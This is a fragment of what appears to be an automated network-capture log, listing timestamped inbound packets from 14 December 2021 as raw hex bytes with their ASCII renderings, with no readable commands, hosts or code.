2021-12-14 12:42:36 UTC	31	IN	Data Raw: b8 36 91 22 6a ca b4 61 90 f6 6b b5 cd 2d 50 da c3 b4 42 29 10 6e 3d 05 53 4f 9f c8 b4 26 08 14 50 a2 9f ae 01 39 0a b8 b1 50 2a bf 23 e2 dc 67 cc bf 11 02 c8 bf 6e 65 59 47 8a b4 4e 6d 00 eb bf a3 8f 2f 37 da 69 61 8e 00 a5 ce b0 71 f9 04 80 0d 4d d3 5b d7 cc b3 27 8a 63 c1 f6 8d 3c 21 bf 63 19 d3 21 80 b5 8c ac f1 45 9b e1 72 76 41 43 6e c4 2f 11 13 a3 48 76 f6 d4 3e b3 91 2e a9 41 60 ed 0b 6d 9f 31 0f f5 05 f5 c1 82 39 ab fa 9e a6 c9 40 78 4a 95 d5 33 17 f9 6c 73 6e a6 8b ee aa cc d5 e1 c5 78 47 37 37 1d 54 50 5d 34 9e 3d 00 f5 7e a7 64 4a 91 7b 2c 40 35 01 98 f3 77 98 9a 3a 42 7d 1d c5 4e 00 45 df 6f bd 6c 0a 43 c6 42 d9 af 5d f6 bc 60 13 3b 95 d2 d6 89 c1 7c 64 d8 0a 70 3d cb ba 72 71 6e c3 e4 fa 43 70 09 1d f8 f6 62 c7 67 68 e5 83 53 53 87 52 38 f9 Data Ascii: 6"jak-PB)n=SO&P9P*#gneYGNm/7iaqM['c<!c!ErvACn/Hv>.A`m19@xJ3lsnxG77TP]4=~dJ{,@5w:B}NEolCB]`;\|dp=rqnCpbghSSR8
2021-12-14 12:42:36 UTC	32	IN	Data Raw: b1 47 85 1c 8f 67 2a b9 b0 52 8d fb 45 78 3f 08 fd 71 2f ae ae c6 49 fd 22 73 c6 93 dc f4 53 89 c9 96 23 9f 11 e1 b8 5d 89 54 9a 11 5c c0 e1 e0 01 e7 12 a4 5c 1b 7e 94 9f f1 0e cf 07 28 1a 65 c9 a0 27 b5 f1 1d 0e 12 9a 46 7f ae 1d 17 a8 a3 29 df 2c 26 e5 5f 38 96 42 f8 6e a3 ff 40 52 57 23 44 ae db 98 37 4a c7 06 bf d9 66 7c 3d d4 d8 46 3c b8 50 21 8d f1 37 c6 3d 57 a8 54 2e 1d 9e 6f b7 56 d9 81 a0 33 66 5c d0 62 c3 f9 98 3f ab e6 a3 28 91 92 4c 47 2f f8 16 3b f5 99 4d 18 02 4d 15 b9 6f ec 19 e6 74 a6 bb 86 3a 92 3d b7 3b 0c c7 e4 c0 ab ec ce 58 76 78 0e 7e cd ed 13 ca 0e 80 c5 a3 1c dd 4f 50 97 77 8b 08 94 51 64 f7 b3 45 c1 3a 03 e2 75 34 1d 75 27 59 fa 87 f0 0d 46 4f 5a 28 f4 b2 73 c6 df 3f 54 26 49 6b 71 90 9a 03 68 29 a0 2d 69 6d 2b 20 1d 14 f0 f2 50 Data Ascii: Gg*REx?q/I"sS#]T\\~(e'F),&_8Bn@RW#D7Jf\|=F<P!7=WT.oV3f\b?(LG/;MMot:=;Xvx~OPwQdE:u4u'YFOZ(s?T&Ikqh)-im+ P
2021-12-14 12:42:36 UTC	33	IN	Data Raw: 8f a4 f9 bc ea d3 3b d5 fb 24 e3 33 6b e6 b6 39 1e 10 34 9e 2f 61 42 05 d6 46 fc ce b3 1c 29 8c 46 e2 a0 56 33 97 47 2b 14 56 d2 24 6d 24 21 1b 9e 47 b9 99 bc 13 9f 2e b3 a7 cc 31 98 31 dc 6e 74 c0 a3 74 c8 d8 b3 73 37 e2 40 5c a9 b2 65 db 75 9b a3 9e 21 21 2d 7e 56 6f 1d 62 4d 04 ed f1 35 97 b9 d1 df 65 c2 d5 b4 09 82 ef c6 fc 84 34 bc 02 6a c9 c0 4a 8b a4 8c ac fb e7 8a 9b 25 32 4d 5e 51 c4 25 a4 2d bb 4b e0 50 c4 46 a7 bb 37 be cd 5f b0 bf f0 34 0a 05 ef 1a f6 7d b8 39 22 fb 3c b7 8b 53 73 4a b6 56 27 0c 7e 41 1c f6 a7 98 e8 b6 c9 4d 41 79 96 4b 20 21 b0 4e 74 64 20 02 2a 7f bb 69 3b 7f 3c a3 fa b0 51 33 15 df cc 77 98 9a 10 56 e0 a5 e5 a0 0f 52 21 5f 9a 47 33 53 c9 44 bb f7 43 fc 48 1b 26 3f 09 63 11 86 67 d1 b3 cf da 78 e0 55 9e 72 60 60 d6 f0 12 55 Data Ascii: ;$3k94/aBF)FV3G+V$m$!G.11ntts7@\eu!!-~VobM5e4jJ%2M^Q%-KPF7_4}9"<SsJV'~AMAyK !Ntd *i;<Q3wVR!_G3SDCH&?cgxUr``U
2021-12-14 12:42:36 UTC	34	IN	Data Raw: 8b c8 a0 e1 6f e7 32 8f 84 f8 e0 d5 cd 02 5d 94 64 fa 41 d9 b2 66 b6 e3 f5 a1 b2 b6 d1 94 a2 04 26 a4 6a f8 d9 c4 4d 21 31 1e b8 1a 0e a1 e9 e5 44 c4 8a 2a 26 02 16 c1 b3 43 37 5f 54 59 42 af 32 75 fd 0e 52 cf 1b 88 98 ae 5d 49 a7 3a 8a 77 c3 72 37 22 af 70 aa b3 9f 67 b6 76 4f 77 28 5b c8 9c db bb 25 4c da 1a b6 56 dc d5 b5 5c ef 12 97 6f f9 6b 47 21 15 36 ba c7 8a e5 f4 5b cf 64 93 92 94 1b 05 94 6d e9 cf f4 91 8f b3 63 64 26 f8 79 f7 41 8a 3d 2f 7e 9d 5b 02 1e 1a 26 b6 34 61 52 fe 5a 90 f7 c8 cb 91 3e 5a c1 15 b1 50 35 8b 46 b3 b2 3d f5 93 d9 b2 18 2e 8b 41 a8 9b bd 8c 2d 03 a3 a8 c8 13 d3 3b f4 4a 7b e8 32 07 9e d3 ba 16 d5 fe 47 80 ad 6c 63 0b e9 b4 b5 8f 24 a2 93 07 e4 f3 14 7f 5e b6 75 ee 28 1a ba 22 70 73 cb c5 9b 7a 90 ee cc de a0 3e 32 b3 74 3b Data Ascii: o2]dAf&jM!1D*&C7_TYB2uR]I:wr7"pgvOw([%LV\okG!6[dmcd&yA=/~[&4aRZ>ZP5F=.A-;J{2Glc$^u("psz>2t;
2021-12-14 12:42:36 UTC	35	IN	Data Raw: ca 71 3d 22 1e 52 23 20 ee b4 e3 22 e9 8a a6 32 03 32 42 f2 f9 bd ff ec 84 b5 43 ed 1c d3 21 c1 67 36 e2 ff 66 3f 99 27 23 84 9a 27 c4 ba bc 9a 79 4a 0a 28 ee 32 8c e2 65 16 51 51 58 bc c1 15 bd 74 a9 be d3 ed 90 23 0f da ca 9f f2 8f 98 b2 fe 6b e6 30 aa 77 2d cf 89 68 7b 0f 08 ec 6c e6 0c 9c 9a ba ad 51 ff cd d3 7b db c4 82 7b 24 4e e0 c8 ca 20 67 66 52 45 ba 27 36 51 fd 68 36 ea 03 3b 1c 4f 1e b7 cc 89 e0 b4 27 be a0 c6 13 ef 56 b0 ad 4b 6b 78 8e 33 46 e7 1c 68 b8 53 77 6e c1 63 3d 99 a2 52 88 f3 48 0a d9 08 d1 73 45 33 e4 d1 95 c6 1e 7f c6 90 d6 0c 21 83 c1 93 2a 88 03 2a b1 18 95 36 bd 19 40 34 f1 c9 1c 8f 17 91 41 1c 6f 98 9c 60 25 e2 0d 20 1c 07 3e be 2d 8c c5 05 12 17 fc 7a 80 af 3b 06 b7 bf 2e c7 3e ce f5 77 b4 36 20 d4 66 bc fc b5 8d 61 30 6a c4 Data Ascii: q="R# "22BC!g6f?'#'yJ(2eQQXt#k0w-h{lQ{{$N gfRE'6Qh6;O'VKkx3FhSwnc=RHsE3!**6@4Ao`% >-z;.>w6 fa0j
2021-12-14 12:42:36 UTC	37	IN	Data Raw: b8 26 bb 38 9d 21 32 34 48 c0 0a 03 23 b5 79 65 ab 78 c8 a2 9a 6e ef 1a 52 95 fd f4 bf e6 54 5d 9e 71 76 39 14 fe 66 b0 f6 ed ba 9d fc c0 93 b1 95 6c 88 6f f6 c4 d6 31 d3 31 0f b5 16 04 77 d8 ca 4f bc cb 24 23 69 59 c6 ac 44 4b 05 55 48 4f a4 d8 5f 98 15 45 b6 99 e6 98 a4 75 cc b4 3d 80 75 c8 7c 3b db b8 5b 32 0c d0 cf b7 76 45 57 29 56 c6 93 e2 d9 4b 12 d1 37 74 61 88 c7 b2 56 ed 1f a0 f5 07 6a 61 38 0e 5f 0e f8 95 e1 f4 57 de 73 85 83 7c 0b 22 02 d2 a6 66 f5 91 85 8a 67 0a e1 f2 51 93 6d 24 e9 03 f7 77 d1 c6 05 09 20 9a 29 77 50 75 60 bc f4 de b7 c1 3e 4b cc d6 af a8 33 b1 43 16 00 6a 3d 6d 26 47 4e 6d 89 41 a4 a0 cd 9c 28 0c a3 a2 c9 13 25 3a f4 46 5c c0 a5 1c ae dc b3 1e 4d fe 47 da be 68 63 1b f2 b2 bc 93 22 57 70 68 4d f7 3c 54 4f b0 7b 97 5a 95 0d Data Ascii: &8!24H#yexnRT]qv9flo11wO$#iYDKUHO_Eu=u\|;[2vEW)VK7taVja8_Ws\|"fgQm$w )wPu`>K3Cj=m&GNmA(%:F\MGhc"WphM<TO{Z
2021-12-14 12:42:36 UTC	38	IN	Data Raw: c5 9b 80 c5 7d 5b 57 25 73 f7 45 3a cd 77 19 87 e8 58 71 46 6c 60 32 27 33 ec ef 65 21 e9 86 9d 89 12 37 59 9b ac 9b fe e6 88 8c 05 f6 73 fc 5e a1 6d 27 e3 cf a3 17 98 21 01 39 b2 41 cf d5 8c 88 7d 51 09 6f 66 31 8c ee 08 71 40 56 4d 90 73 06 b9 fc 36 6f ff ec 9a 46 3e 05 d0 84 f1 8f 82 b2 fe 6b 80 20 ce 76 27 d6 52 9d 12 14 23 c2 e5 88 5b 96 96 b6 79 36 e5 a3 cb 70 d6 c7 80 54 24 4f f6 e5 c8 09 2e 51 7a ec e2 27 3e 42 f9 79 32 66 b4 23 2d 2f 67 b3 d5 80 f6 a7 2f 8e b9 d3 1a 79 5e 2a be 00 7a 7e 98 0f 69 94 7d 63 ab 5c 6a 18 8b 53 3d 93 a5 77 89 ea 49 6d c8 21 60 79 2a ad f5 d9 88 7f 2f 76 d7 92 d4 03 dc 12 f2 5c 32 9c 2e ba b5 09 99 74 0e c6 4e 2c e7 32 12 f4 3e 90 5a 79 29 9d 84 05 d3 c9 0d 2a 1e 3f 58 bf 2f 86 28 03 7e 69 90 5f 81 af 31 15 ab 9e 2c d6 Data Ascii: }[W%sE:wXqFl`2'3e!7Ys^m'!9A}Qof1q@VMs6oF>k v'R#[y6pT$O.Qz'>By2f#-/g/y^z~i}c\jS=wIm!`y/v\2.tN,2>Zy)*?X/(~i_1,
2021-12-14 12:42:36 UTC	39	IN	Data Raw: d0 2a a2 c6 10 d4 55 c6 fd d6 f4 b9 a5 d3 6b 7a e8 cd 17 93 4c 9d 0d 34 00 61 b0 17 12 27 9f 1c 4b bb 78 c2 7c 35 6b ca 32 67 86 f8 ec b7 8b 8f 48 9e 75 f3 5d 9e c6 66 b6 e3 3a ae 9c 93 02 94 a8 61 47 a3 40 f2 c8 cd 3e d4 31 1c b2 0f 08 eb b1 e6 52 c2 86 24 23 6d 4a c6 b3 33 d8 02 40 43 48 bc 27 4d 84 1c 46 fd d8 88 98 f3 75 d5 b6 2c 93 61 f7 2a 30 25 b9 77 35 01 ef c4 48 77 69 6b 31 7f a6 9a ca b1 25 8f db 1a b6 47 91 d5 b5 56 e3 13 ac fd f9 7a 48 2f 11 a7 23 eb 83 d7 c4 51 de 62 9d 96 91 0f 0e 0b df 9a 98 f5 bd 8e a0 5f 81 e0 f8 73 ee 68 39 f0 3c 6f 98 2b 26 13 e4 26 b6 36 79 57 8f ef 27 c8 b5 a4 c6 3e 45 c5 da a5 56 23 98 5a c3 04 7e 52 91 f1 97 30 1f 82 78 3d 88 b8 9d 34 15 a5 a6 dd 3e ad c4 f5 6c 70 eb 77 18 97 ca b6 79 5c fb 5f 74 bf 44 7b 7e 44 b0 Data Ascii: UkzL4a'Kx\|5k2gHu]f:aG@>1R$#mJ3@CH'MFu,a0%w5Hwik1%GVzH/#Qb_sh9<o+&&6yW'>EV#Z~R0x=4>lpwy\_tD{~D
2021-12-14 12:42:36 UTC	40	IN	Data Raw: ff 0c ec f6 ee f8 66 73 d4 ac e3 bd 87 58 2f 2f d3 ed 14 9d c9 f6 58 e9 25 72 ee 22 11 c4 61 05 1d d1 cf 64 50 f6 0f 5a 3f 25 74 d6 cd 3a ff 1c a4 3f 08 21 cf e5 9e 81 e8 70 9f ac 5a e3 ef eb 28 dc 7b bb f6 ef 17 03 04 36 21 98 bb 57 59 ab be 96 77 4d 93 56 cd 2c 87 fe ea 00 48 5d 4b a1 d0 12 a6 f6 36 c2 fe ec 9a 2b 8a b3 cf 9e 2d f7 2a 3e d5 61 ef 5e c3 74 32 ca 5d a0 73 88 93 f5 6a 53 73 8f 9b b0 7b 2a 6f a3 cb 7c c8 c8 b7 6b a9 64 fc c8 cb 31 62 50 dc e8 f3 22 b6 e6 27 7f ec ff d5 b8 37 15 76 b6 cb 81 e8 3a 90 ba 80 18 02 6d 40 af bd 2e 78 79 9f 2d 45 82 74 7f b0 d7 cc 0c a6 ec 8a 49 87 48 81 fb 46 4d 56 09 d1 73 3b ad e7 d6 8b a0 2d 7b a9 02 c4 0a 54 ca d8 92 20 91 15 3f a5 0d bb c5 9a 18 4a 34 3e dd 21 c8 09 90 41 1c 6d 9a 90 05 27 db 0d 2a 15 f1 58 Data Ascii: fsX//X%r"adPZ?%t:?!pZ({6!WYwMV,H]K6+->a^t2]sjSs{o\|kd1bP"'7v:m@.xy-EtIHFMVs;-{T ?J4>!Am'*X
2021-12-14 12:42:36 UTC	42	IN	Data Raw: 84 83 1e 1b 9b b9 d3 62 4b 29 11 f3 0e fc f4 37 a9 1c 2a a8 e4 92 d1 3a 0b 92 42 ff 94 67 1e 43 7a e9 ac 04 fe 4f 9c 27 2e 9c 62 c5 2c 13 33 8a 67 34 18 78 c8 aa c3 6f ef 1a 5a 8b e9 e3 ae b5 6c 5e 9e 73 e4 db b1 fe 66 b7 fd f0 bd b2 5f d1 94 a2 43 7c a4 6a f8 db c8 2b c8 bd 21 b2 09 09 9f f1 73 45 c2 8c 08 3d 7c 4e d8 3f 76 58 02 54 4f 60 29 27 5e be 33 48 70 90 88 98 a6 5d c1 a7 3a 8a 77 c8 48 3d f5 f3 77 24 06 d8 da b6 76 4f 6c 3e 41 d5 91 b4 c5 4b 12 d1 09 b5 68 91 dc a7 5f d4 7b bf f8 ff e7 72 30 1f 58 31 c1 9b e9 cf 0a de 62 88 8f ac 0d 08 11 07 16 62 f4 91 94 ab 7b 78 77 f9 79 f7 7f 2e f2 33 7d a0 06 56 1d 1a 21 b2 af 71 46 81 70 b9 df b9 a7 c6 38 35 53 c8 a0 5c 23 97 53 14 2d 23 5f 93 df 90 a7 1e 88 4b bf a1 90 ef 2b 06 a6 c9 54 3a b3 30 e5 4a 64 Data Ascii: bK)7*:BgCzO'.b,3g4xoZl^sf_C\|j+!sE=\|N?vXTO`)'^3Hp]:wH=w$vOl>AKh_{r0X1bb{xwy.3}V!qFp85S\#S-#_K+T:0Jd
2021-12-14 12:42:36 UTC	43	IN	Data Raw: e9 66 6f 06 00 7e 25 cf 63 61 73 70 cf e7 2f 7c 29 de f3 02 fd e5 ef b1 7b ef ba e8 42 ad 66 ae 89 2c 12 db 8d e0 53 44 e9 25 79 ee 02 28 f4 77 13 8b 1e c7 75 6c 6d 34 52 27 33 a9 f3 c5 23 e9 80 b5 37 8c 35 53 f4 fb 98 fe ec 85 a1 46 f5 7c fa 20 c1 77 27 e7 e6 09 15 98 27 38 87 b2 41 ec bf b6 89 47 5e 0f 47 ca 33 8c e8 6c 11 40 57 5a 88 d0 04 aa f9 1e d1 9f ec 90 38 12 17 da b6 f4 e3 fc b3 fe 70 e5 46 31 77 01 d1 5d d9 02 07 24 e0 4d 0f 58 9c 9c df d1 58 f8 a8 c6 60 c8 c4 a8 6a 2e 53 02 c9 e6 61 76 5c 7a 05 e2 27 32 14 f0 68 36 e8 c4 35 1c 15 10 b7 c6 89 72 b4 27 a5 f9 c0 13 68 77 b2 ad 06 67 78 9f 27 be 94 7d 69 3a 58 7b 1d fa 60 3d 93 f6 59 80 fb 15 67 c1 09 88 7b 2a ab 0d d0 9f a9 21 6d cc 9a d4 00 4d b3 3e 92 0c 80 00 eb 0f 09 93 58 b2 0c 40 3e ea e4 Data Ascii: fo~%casp/\|){Bf,SD%y(wulm4R'3#75SF\| w''8AG^G3l@WZ8pF1w]$MXX`j.Sav\z'2h65r'hwgx'}i:X{`=Yg{*!mM>X@>
2021-12-14 12:42:36 UTC	44	IN	Data Raw: b0 04 66 dc a7 29 de d1 ec d4 de 1d 35 36 40 49 d0 87 83 09 07 dd b9 d3 62 6c 2b 30 3b 25 f2 e3 5d 78 ca 39 a7 dd 04 c1 3c 8f 4a e4 30 9c 45 4c 45 6b ea 90 a1 90 4c 9a 09 8d 11 65 c3 26 cc 32 bb 5b 2b bb 78 c2 b3 ef 0d 55 1a 50 8c f2 ce 82 9d 02 57 40 75 f4 7c b7 ee 66 b6 e9 e4 a9 9a 89 a4 94 bd 71 6d a4 6b e9 f8 c8 22 5d 30 1e b2 6a 08 89 c8 f9 58 ea 3d 24 23 67 62 4e b0 49 5e 2a 71 59 48 b6 2b 57 9c a6 46 a0 df 83 eb 1e 75 d5 ad 30 87 0b 1c 63 31 2f aa 78 32 17 fe f6 fb 77 45 7f 28 58 d7 97 50 a4 4e 03 df 32 8d 7e 83 de 98 53 c4 2a be f8 f9 7a 49 43 92 58 22 c1 99 e8 39 42 fb 4a b5 99 82 00 1d 12 f2 be 66 f4 9b 58 b7 76 0b e1 e9 7e d5 00 27 e3 3f 00 0e 2f 39 18 37 22 a2 3a 71 46 8b 70 94 df 42 a5 c6 34 35 45 c8 a0 5c 5d 11 40 3d 0f 7a ea 93 d9 be 23 1a Data Ascii: f)56@Ibl+0;%]x9<J0ELEkLe&2[+xUPW@u\|fqmk"]0jX=$#gbNI^qYH+WFu0c1/x2wE(XPN2~SzICX"9BJfXv~'?/97":qFpB45E\]@=z#
2021-12-14 12:42:36 UTC	45	IN	Data Raw: 7c 1a 46 d8 4b a7 28 43 fc 44 76 e5 25 94 c7 cb b6 12 66 65 d8 11 66 27 d4 9d e4 63 61 da 99 8e 43 5c 25 24 6a ef ee fe 71 40 ca ab e3 59 91 18 f9 75 d3 ed 14 8b d4 77 5b 71 26 73 fb 45 8a cd 77 15 92 c6 d6 7a 57 66 36 cb 24 33 ee a8 4f 22 e9 86 a6 3d 03 3e 42 f8 be 00 fd ec 88 cb cc f4 73 fc 08 79 6d 27 e1 f4 01 04 90 33 d7 86 a3 49 bb 29 b6 89 77 4d 27 69 c5 33 86 fe 88 10 20 7a 6c a9 d0 28 98 d2 59 d0 ff e6 81 20 15 08 f8 ed f4 e0 fa dc 74 60 ef 59 a0 ee 2d c5 5f a7 76 2e 93 ea 65 8f 48 94 8b b6 59 d6 f9 a2 c1 57 98 df a2 53 ab 4e fc c2 e7 18 76 50 7e 69 91 05 3a 51 fb 7b 3b f9 0e 24 1a 7a 5e b5 c6 8f f1 b9 36 af ff e6 11 68 50 a1 a0 17 63 17 b9 25 4d 92 6c 64 90 66 78 1d a5 0d 17 91 af 5d 86 ea 41 0a d6 08 d1 73 02 85 e6 d1 99 ba 34 a0 c9 bf ed 3d 52 Data Ascii: \|FK(CDv%fef'caC\%$jq@Yuw[q&sEwzWf6$3O"=>Bsym'3I)wM'i3 zl(Y t`Y-_v.eHYWSNvP~i:Q{;$z^6hPc%Mldfx]As4=R
2021-12-14 12:42:36 UTC	47	IN	Data Raw: 51 62 f7 8f 55 cd 47 2d e0 75 76 0e 7e 24 44 e7 ab ac 0a 21 53 a5 29 d2 ac 73 fc 19 17 19 21 5a 69 5a ac d4 0d 68 27 d6 fb 6a 41 29 3f 26 09 93 20 58 6f 16 45 86 ce 01 d6 3c 29 6a d6 fe 9e 7c 0b 29 b9 ec b8 26 bb 2a 9d 21 32 7e 7d c4 2c 18 48 b8 71 1c bd 7e e0 07 e8 7e e9 75 7a 84 f8 e0 bc 96 dc 48 bb 5d c5 56 b6 f4 75 bf 9a c6 ab 9a fa da bc 90 6b 6d ae b4 f2 cf e6 23 c4 31 1e b2 09 0e 89 2a 1f 44 d7 9c 24 23 6c 51 f0 b0 49 04 02 55 59 16 bc 26 4f c7 a5 46 a0 d3 82 9e da 59 d4 a7 3e a8 73 cd 63 37 0d ea 74 24 02 d8 d6 b4 76 43 10 ff 57 c6 93 14 b9 6f 3a ec 1a bc 74 8f fc 8d 56 fc 12 61 f8 ff 15 61 31 1f 5d 0a d0 88 ef e1 78 8d 61 82 9f aa 13 0c 1a dc e9 a0 f4 91 8f 7c 79 2e c9 cf 79 fd 66 29 cb 01 6f 89 24 e7 1e 1c 0d 9b 24 70 46 8b 61 96 f7 d5 86 c6 30 Data Ascii: QbUG-uv~$D!S)s!ZiZh'jA)?& XoE<)j\|)&!2~},Hq~~uzH]Vukm#1D$#lQIUY&OFY>sc7t$vCWo:tVaa1]xa\|y.yf)o$$pFa0
2021-12-14 12:42:36 UTC	48	IN	Data Raw: 8a b0 54 7d 93 97 34 6f 6e 12 cf 66 d9 52 21 6e 96 1c 9f 51 c9 44 db a6 9c e8 67 49 08 36 87 de d4 89 ef 6b 4d e0 00 6f 3c 05 93 70 60 61 cd f0 2c e9 5f 23 0a 92 6b ef f8 61 45 e6 ad c9 45 96 5e 40 fd d2 ed 03 95 1f 68 65 fa 2d 4b 71 2a 00 cc 66 15 90 c8 d0 1c cf 6b 1e 54 34 3a f9 c1 d4 2b f3 ef 3c 36 12 31 40 ff 87 9c ef e4 97 cb cf f4 73 fc 33 cb 7c 2e cf 68 08 15 92 0a 61 96 b9 69 4a bb b6 83 50 64 1e 4d ed bc 8d e8 7c 3c 76 25 6b ba d7 02 aa f6 0f dd ee e5 ff 01 06 04 d6 9f fb f1 f7 dc da 63 ef 59 de 7a 3c cf 3a 90 73 06 22 fb 69 a1 f7 9f 9a b6 1e 73 fa a2 cd 7c ca c2 c7 6c 25 4f f6 16 c5 07 4f 6f 52 5f e8 34 35 79 c5 68 36 e2 dd 35 0d 1d 61 61 d5 81 f1 bc 36 b3 ae a9 ec 97 a9 98 00 05 6b 7e ec a3 4c 94 77 61 90 07 78 1d a5 4a a6 93 af 51 a8 67 4c 65 Data Ascii: T}4onfR!nQDgI6kMo<p`a,_#kaEE^@he-Kq*fkT4:+<61@s3\|.haiJPdM\|<v%kcYz<:s"is\|l%OOoR_45yh65aa6k~LwaxJQgLe
2021-12-14 12:42:36 UTC	49	IN	Data Raw: 33 ec 24 a7 72 82 ee 66 c7 ce 2f 0b 40 64 8e 33 9b 40 72 da c3 b8 3e 90 05 8d b6 71 1d 7f 59 8b f7 ac b7 1e 56 7c fa 3b c0 96 b4 d5 de 1d 0a 34 58 72 33 a1 81 0f 6e 4e 70 d3 68 4b 38 08 71 7d de f0 58 69 0f 3e b3 d8 10 c3 55 26 ff d6 f8 fb 45 0f 46 6d fd ac 3d 80 23 bf 23 38 17 0a e1 2e 12 21 8f 67 0d a8 17 ed a2 eb 78 80 3c 52 86 fe f7 ae b5 be 5e 9e 73 9d 7c b4 fe 60 a7 ed f5 bd f5 eb d0 94 a2 79 75 8c ac f3 c8 c6 0f 4d ef 10 a0 11 f6 9f c7 e6 44 d9 e9 73 23 6d 40 1c a2 4d 72 02 55 58 60 bc 26 5c b4 e3 46 0d 70 89 96 a4 75 d5 a7 38 80 bd ce c0 4d 27 b7 77 24 04 f0 cc b6 ef 47 07 28 54 c8 99 ca b7 4a 09 eb 10 bc 36 82 d4 b5 3c fc 18 ae e7 e9 e6 66 30 1f 58 31 c1 9b e9 f1 46 42 73 84 8e 94 96 1f 1c c2 90 fa e5 97 9c b4 eb 1a e7 e2 6f 61 7d 22 f8 2f f3 98 Data Ascii: 3$rf/@d3@r>qYV\|;4Xr3nNphK8q}Xi>U&EFm=##8.!gx<R^s\|`yuMDs#m@MrUX`&\Fpu8M'w$G(TJ6<f0X1FBsoa}"/
2021-12-14 12:42:36 UTC	50	IN	Data Raw: e0 3f b8 55 16 7e 97 ac 3b 0e e3 07 53 20 2f 58 be 5c b9 d6 01 02 ec 98 52 81 db 23 15 b0 b5 03 d6 3a d8 ff 43 39 81 13 f8 67 bc a8 be 53 6a 52 d5 ab e3 ec c2 b3 46 3a b5 f2 68 56 2f 9c 49 5f 19 c7 51 37 80 dc 0a 8e 2a 87 93 97 64 15 a5 0d af 59 e2 86 a2 33 51 50 f8 5a 80 f9 92 f0 bd ec f6 2c 90 9a 50 91 39 d6 1b 43 ea c8 4e 1c 77 2e 0d bb 65 e1 6f 2c 74 ae a6 a6 35 9b 17 98 37 0c c5 ff 16 92 c0 cc 45 a4 78 00 4d 32 f0 3f c8 25 82 e8 6c 07 fd 20 12 8c 77 81 23 94 51 54 e4 9f 0b c1 61 19 e2 75 71 06 45 3f 4f 12 ae bd 0d 22 57 a4 38 ab 04 71 d4 d4 1d 67 b4 49 61 56 88 fd 9c 68 21 b3 c0 6d 3f 01 38 37 0a d4 e5 5a 6f 1a 27 ab e4 c1 d3 3a 07 d5 4d fe 94 67 25 da 6b ec b2 3f 97 5d 98 09 09 11 65 cf 01 15 21 95 ae be b9 78 c8 b1 ef 56 7a 1a 50 8c eb ee ab 95 2a Data Ascii: ?U~;S /X\R#:C9gSjRF:hV/I_Q7dY3QPZ,P9CNw.eo,t57ExM2?%l w#QTauqE?O"W8qgIaVh!m?87Zo':Mg%k?]e!xVzP
2021-12-14 12:42:36 UTC	51	IN	Data Raw: 97 b0 d5 b4 8c 24 11 76 b5 c0 2a bf 2b e4 71 c1 d1 a2 68 57 d9 b3 73 5b cd 45 54 c8 1b 50 0f f8 b6 b0 94 31 26 0c a7 4e f3 12 1a 67 b2 71 fe 3d 9e 1c 4a b6 57 c9 cf b5 30 9b ff c2 99 ab 3f 32 b3 63 19 ed f6 ab a4 8a c3 d1 e5 8a ed 63 78 6f a0 46 c5 2f 1a a0 bc 2d a9 e7 d3 96 98 36 c9 40 32 81 fb 1a 62 48 1b 05 ef 1b c9 41 ac 37 de c0 3c b7 c2 3c 24 5b 9e cb fb d2 61 66 5b 59 a7 98 e8 a8 cd b0 4c 59 69 41 2b 09 b9 45 5c 4f fd 00 2a 26 eb 42 3b 75 46 ca 59 b0 51 3b 16 b0 54 2e 98 90 1c 3d 6f 12 c5 e3 0e 52 21 78 91 6f 12 50 c9 42 c8 a0 42 fc 42 67 3f 36 87 1a c6 8e e9 b2 64 d8 00 7a 36 d8 b5 68 60 61 dd e5 34 47 5c 27 0d fd ec 80 f8 67 79 f2 b8 e6 6b 72 58 2f 75 d3 fc 00 9a 3b 7a 5f e0 0d 5d ff 2a 06 c0 6e 00 84 c0 d6 76 59 61 e0 53 0b 3f e1 d6 c1 1d 83 80 Data Ascii: $v+qhWs[ETP1&Ngq=JW0?2ccxoF/-6@2bHA7<<$[af[YLYiA+E\O&B;uFYQ;T.=oR!xoPBBBg?6dz6h`a4G\'gykrX/u;z_]*nvYaS?
2021-12-14 12:42:36 UTC	53	IN	Data Raw: c0 93 20 e8 06 3b b4 d2 93 59 9a 14 40 3e e0 d6 04 e0 3f 92 41 16 7e a6 84 0f 0f 59 0d 2a 1f da 58 bf 2d 90 d6 01 03 12 93 51 81 af 31 15 b0 a8 29 d6 3a c0 e5 73 3a 9f 4e f8 67 a9 f6 be 53 61 21 6f aa f8 d6 cb b5 78 10 b4 f2 1d 7e 38 8f 3a e3 31 96 58 3d f8 c8 12 8c 20 a9 24 52 64 13 b8 bc 9c 7c ca bb 8f 34 5d 57 0d 7d 81 f9 98 f0 a9 cf a0 30 91 9a 5e aa 2a d2 10 6d fa 99 4d 16 ac 0f 15 b9 65 99 3c ea 74 a4 84 a0 38 be 39 b8 58 31 cf f2 34 a6 c8 a3 fe 7b 78 0c 6a 3a ff 31 de 36 8f d6 ae 1b df 20 0d 98 66 8c b8 87 54 1a d8 83 47 cb 47 da e1 75 76 0c 70 1e 6b f6 ac b7 1a 21 6a a4 29 d2 ad 77 fc cb 16 19 2d 58 67 74 5e 80 0f 6e 4e 0b d2 68 4b 5b 2b 37 0e e7 9d 40 6e 1c 20 b1 c7 10 d6 12 da fe d6 f8 fb df 0c 46 61 98 aa 2c 93 57 8f 26 29 17 4d 19 2f 12 21 f1 Data Ascii: ;Y@>?A~YX-Q1):s:NgSa!ox~8:1X= $Rd\|4]W}0^mMe<t89X14{xj:16 fTGGuvpk!j)w-Xgt^nNhK[+7@n Fa,W&)M/!
2021-12-14 12:42:36 UTC	54	IN	Data Raw: e7 ec b1 50 23 98 69 d5 06 52 5a 86 cf 90 74 1e 88 4b b9 12 90 74 2b 06 a6 b3 da 13 f7 3b f4 4a 60 5a ca 23 9c d9 b5 68 48 d6 ad 89 be 6e 1d 90 f8 b0 a9 b2 11 3d 22 79 48 db fe 76 4f b6 64 ee 04 d0 0c 4d d3 64 51 e7 58 22 91 e8 d3 e0 a5 79 33 b5 78 05 5f 0e ab a5 8c aa d3 7b 8a eb 6f 06 43 cd 51 c2 04 23 a0 b7 6a 82 e4 d3 9a cd 06 37 bf c7 73 c8 1a 6a 2c 25 2d 03 19 e5 4b a8 2f 83 bf 3d b7 c9 44 e9 73 75 c2 27 0a 61 55 5b 2a a6 98 e8 ad 5a ac d0 5b 69 4d 31 27 a9 a8 5f 45 25 6d 06 0e ec 6e 3d 64 40 e4 7a b1 51 33 07 ba 3b b0 98 90 16 64 a5 ec 3a a0 d1 44 30 64 e4 54 12 50 c8 6e c4 b1 48 89 79 61 3f 37 e8 83 c7 8e e3 ba 74 d0 17 b9 25 d0 a4 7a 71 68 52 41 3b 38 a2 dc f3 23 f9 cb 